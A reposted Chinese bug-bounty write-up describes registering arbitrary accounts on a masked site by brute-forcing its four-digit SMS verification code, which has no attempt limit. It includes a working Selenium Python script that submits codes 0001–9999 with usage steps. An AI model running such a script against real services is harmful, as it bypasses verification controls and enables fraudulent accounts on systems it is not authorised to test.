0X01 漏洞复现
1、首先来到登录页面,看到了注册
2、接着点击进入到注册这里
3、点击获取验证码发现是四位数的,提交的时候验证码也是加密的
4、接下来测试一下有没有次数限制,先跑100次,发现它不会检测你提交了多少次,只要你输入对了,但是验证码RSA加密了反编译不出来咋整?
5、别慌,我们还可以手动去提交,从0001-9999依次去提交就完事了
6、太累了,还是直接写python脚本去跑吧
# -*- coding:utf-8 -*-
from selenium.webdriver import Chrome
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
import time
url = "http://xxx.com/hkc/register"
web = Chrome()
web.get(url)
a = input(">>")
codeby = web.find_element(By.XPATH, '//*[<span class="label label-primary">@id=</span>"app"]/div/div[2]/form/div[5]/div/div[1]/div/div/input')
f = open('./four_code.txt', mode='r', encoding='utf-8')
"""
1. 使用selenium模块,并下载谷歌浏览器驱动放置在python跟路径
2. 填写其它必要注册信息,获取验证码,接下来的交给脚本(若提交按钮呈现灰色,请先随便输入验证码,点击一次提交按钮,然后清楚你输入的验证码)
3. 回到脚本,随便输入一个字符,开始自动爆破验证码
"""
for code in f.readlines():
codeby.send_keys(code.strip())
web.find_element(By.XPATH, '//*[<span class="label label-primary">@id=</span>"app"]/div/div[2]/form/div[7]/div/div/button').click()
codeby.clear()
成功拿下漏洞
原文始发于微信公众号(渗透安全HackTwo):某SRC任意账户注册绕过加密
原文始发于微信公众号(渗透安全HackTwo):某SRC任意账户注册绕过加密
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论